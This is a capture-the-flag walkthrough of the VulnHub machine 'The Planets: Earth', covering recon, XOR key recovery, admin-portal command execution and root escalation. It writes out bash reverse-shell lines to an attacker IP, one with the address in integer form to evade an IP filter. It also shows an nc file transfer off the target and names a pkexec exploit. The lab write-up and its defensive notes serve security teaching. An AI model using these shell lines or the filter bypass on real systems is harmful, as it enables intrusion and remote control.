The Planets:Earth

Target VM download

The Planets: Earth ~ VulnHub

Information gathering

# nmap -sn 192.168.1.0/24 -oN live.nmap                         
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 09:20 CST
Nmap scan report for 192.168.1.1
Host is up (0.00036s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.1.2
Host is up (0.00024s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.1.85
Host is up (0.00072s latency).
MAC Address: 00:0C:29:29:1A:27 (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:F8:6E:9F (VMware)
Nmap scan report for 192.168.1.60
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds

From the sweep, the live target host is 192.168.1.85 (the others are the VMware host, gateway and the attacking machine).

# nmap -sT --min-rate 10000 -p- 192.168.1.85 -oN port.nmap    
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 09:21 CST
Nmap scan report for 192.168.1.85
Host is up (0.0064s latency).
Not shown: 65511 filtered tcp ports (no-response), 21 filtered tcp ports (host-unreach)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
MAC Address: 00:0C:29:29:1A:27 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.94 seconds

The open ports are 22, 80 and 443, corresponding to ssh, http and https respectively; the foothold should therefore be somewhere on ports 80 and 443.

# nmap -sT -sC -sV -O -p22,80,443 192.168.1.85 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 09:21 CST
Nmap scan report for 192.168.1.85
Host is up (0.00059s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_http-title: Bad Request (400)
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Test Page for the HTTP Server on Fedora
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
| tls-alpn: 
|_  http/1.1
MAC Address: 00:0C:29:29:1A:27 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 5.4 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 5.1 (91%), Linux 2.6.32 - 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

Detailed service detection: port 80 runs Apache httpd 2.4.51 (Fedora) with mod_wsgi/Python, and the TLS certificate on port 443 also leaks DNS names in its Subject Alternative Name field (earth.local and terratest.earth.local);

# nmap -sT --script=vuln -p22,80,443 192.168.1.85 -oN vuln.nmap 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 09:22 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.85
Host is up (0.00039s latency).

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-csrf: Couldn't find any CSRF vulnerabilities.
443/tcp open  https
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:29:1A:27 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 93.53 seconds

The default vuln script scan turned up nothing of value; we still need to look for a foothold on ports 80 and 443.

Penetration testing

The home pages on ports 80 and 443 look the same:

[screenshot 1]

Try a directory scan:

[screenshot 2]

[screenshot 3]

The directory scan results still contain nothing of value~

An initial vulnerability scan with nikto likewise finds nothing:

[screenshot 4]

Search for public vulnerabilities: Fedora, mod_wsgi and so on:

[screenshot 5]

These don't match our Apache version; this isn't the right system, is it?

One information disclosure issue came up; but the http-title for port 443 in the recon was "Test Page...", so I went back and revisited the service on port 443:

[screenshot 6]

Then I remembered the two domain names seen above and tried adding them to /etc/hosts!

192.168.1.85 earth.local terratest.earth.local

Try accessing the site again:

[screenshot 7]

[screenshot 8]

Now both ports 80 and 443 show a real application~ Port 80 shows much more: it asks for a message and a message key~ I couldn't immediately think of a vulnerability here; after entering a message and a message key and clicking send, the previous messages are echoed back below!

Run the directory scan again on both ports:

[screenshot 9]

[screenshot 10]

Look at the robots file on the https site:

[screenshot 11]

At the bottom is testingnotes.*; trying the .txt extension at random returns:

[screenshot 12]

[screenshot 13]

Two findings: testdata is used to test the encryption, and the encryption method is XOR; terra is the account used for the admin portal!

[screenshot 14]

Using the contents of testdata as the key, try decrypting the three ciphertexts shown at the top of the port-80 page! The first one gave:

[screenshot 15]

A repeating string, earthclimatechangebad4humans; judging it to be the password, try logging in!

[screenshot 16]
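As an added illustration of the XOR weakness behind this step (my own example, not the box's code or the author's script): because XOR is its own inverse, XOR-ing a ciphertext with a known plaintext such as testdata returns the keystream, and the shortest repeating unit of that keystream is the key itself, which is why the decrypted output above shows the password repeating. The sample plaintext and all function names here are constructed; the key is the one the page recovers.

```python
from itertools import cycle

# Constructed sample values: the key is the password the page recovers, the
# plaintext stands in for the box's testdata and is not the real file.
KEY = b"earthclimatechangebad4humans"
SAMPLE_PLAINTEXT = (b"According to radiometric dating estimation and other evidence, "
                    b"Earth formed over 4.5 billion years ago.")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; the same operation encrypts and decrypts."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def encrypt_message(message: bytes, key: bytes) -> str:
    """What the message form on port 80 does: message XOR key, shown as hex."""
    return xor_bytes(message, key).hex()


def recover_keystream(cipher_hex: str, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack on XOR: ciphertext XOR plaintext = keystream.
    zip() truncates to the shorter of the two, so no cycling of the plaintext."""
    ciphertext = bytes.fromhex(cipher_hex)
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def shortest_period(stream: bytes) -> bytes:
    """Shortest repeating unit of the keystream, i.e. the key that was reused."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream
```

The lesson for the defender is that a short key reused across a message longer than itself is recovered outright from a single known plaintext.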

Command execution is possible~ a reverse shell could be written here. First check whether ssh login works with these credentials! If it does, the privileges obtained should be higher!

[screenshot 17]

That failed, so it has to be a reverse shell.

bash -i >& /dev/tcp/192.168.1.60/4444 0>&1

[screenshot 18]

"Remote connections are forbidden"~ I tried reading the flag file directly, but there was no flag in earth's home directory; searched for it with find:

[screenshot 19]

[screenshot 20]

The flag file was read successfully; but the reverse shell still wouldn't work, so browsing the site's files I found forms.py, which restricts IP addresses!

[screenshot 21]

The relevant code in it:

import re
from ipaddress import ip_address
# value is the submitted form field; ValidationError comes from the form
# framework (assumed to be Django's django.core.exceptions.ValidationError,
# the page does not say)

# Reject the value if it contains any syntactically valid dotted-quad IPv4 address
for potential_ip in re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', value):
    try:
        ip_address(potential_ip)
    except ValueError:      # not a real address (e.g. an octet above 255)
        pass
    else:
        raise ValidationError('Remote connections are forbidden.')

The regular expression checks whether value contains three groups of 1 to 3 digits each followed by a dot and then a final group of 1 to 3 digits, i.e. a dotted-quad IPv4 address; anything that ip_address() accepts is rejected. So the idea is to convert the IP address to its integer form and try the reverse shell again! (Converter used: number to IP | IP to number | domain to numeric IP | numeric IP geolocation lookup - 站长工具)

[screenshot 22]

bash -i >& /dev/tcp/3232235836/4444 0>&1

[screenshot 23]

Shell received!
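As an added example (my own, not from the box or the author): the dotted-quad check from forms.py side by side with a hardened version that also treats integer-form hosts as addresses, which is exactly the form that got past it above. Function names, the NUMERIC_HOST pattern and the 2**24 floor are my own choices; the strings being checked are the ones already shown on the page.

```python
import re
from ipaddress import ip_address

# What the box's forms.py looks for: dotted-quad IPv4 literals only.
DOTTED_QUAD = re.compile(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}')
# Bare numeric tokens that inet_aton-style resolvers (what bash's /dev/tcp goes
# through) still accept as a host: decimal, 0x-prefixed hex, leading-0 octal.
NUMERIC_HOST = re.compile(r'\b(?:0[xX][0-9a-fA-F]+|0[0-7]+|\d+)\b')


def contains_ip_weak(value: str) -> bool:
    """Mirror of the page's check: true only if a valid dotted-quad address appears."""
    for potential_ip in DOTTED_QUAD.findall(value):
        try:
            ip_address(potential_ip)
        except ValueError:          # e.g. an octet above 255
            continue
        return True
    return False


def as_inet_aton_int(token: str):
    """Parse a token the way inet_aton does; None if it is not a number."""
    try:
        if token[:2].lower() == '0x':
            return int(token[2:], 16)
        if len(token) > 1 and token[0] == '0':
            return int(token[1:], 8)
        return int(token, 10)
    except ValueError:
        return None


def contains_ip_hardened(value: str) -> bool:
    """Weak check plus integer-form hosts: 3232235836 is 192.168.1.60.
    The 2**24 floor (my own heuristic) keeps ports and small counters out."""
    if contains_ip_weak(value):
        return True
    for token in NUMERIC_HOST.findall(value):
        n = as_inet_aton_int(token)
        if n is not None and 2 ** 24 <= n <= 0xFFFFFFFF:
            return True
    return False
```

Shortened two- or three-part dotted forms that inet_aton also accepts are still not covered, so treat this as a stop-gap: the durable fix is an allow-list of destinations, or not handing user input to a shell at all.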

Privilege escalation

Method one: pkexec

The current user is apache, with fairly low privileges; look for files with the SUID bit set:

[screenshot 24]

pkexec is there; try exploiting CVE-2021-4034!

[screenshot 25]

Privilege escalation succeeded~ Read the flag file under the root directory:

[screenshot 26]

Method two: reset_root

Again in the SUID file listing, one file stands out:

[screenshot 27]

The reset_root file; use strings to view the printable strings in it:

[screenshot 28]

It resets the root account's password on the target! Run it directly, then use that password to switch to root!

Execution failed, though; try pulling the file down to the attacking machine:

nc -lvnp 6666 > reset_root    # receive the file on kali
nc 192.168.1.60 6666 < /usr/bin/reset_root    # the target sends it with nc
# install strace and trace the process
strace ./reset_root

[screenshot 29]

strace shows three files are missing; create those three files on the target and run it again!

[screenshot 30]

Once they are created, running it resets the password!

[screenshot 31]
